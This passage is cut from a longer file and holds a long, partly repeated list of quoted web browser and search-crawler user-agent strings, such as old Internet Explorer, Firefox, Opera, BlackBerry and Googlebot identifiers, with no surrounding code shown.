3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 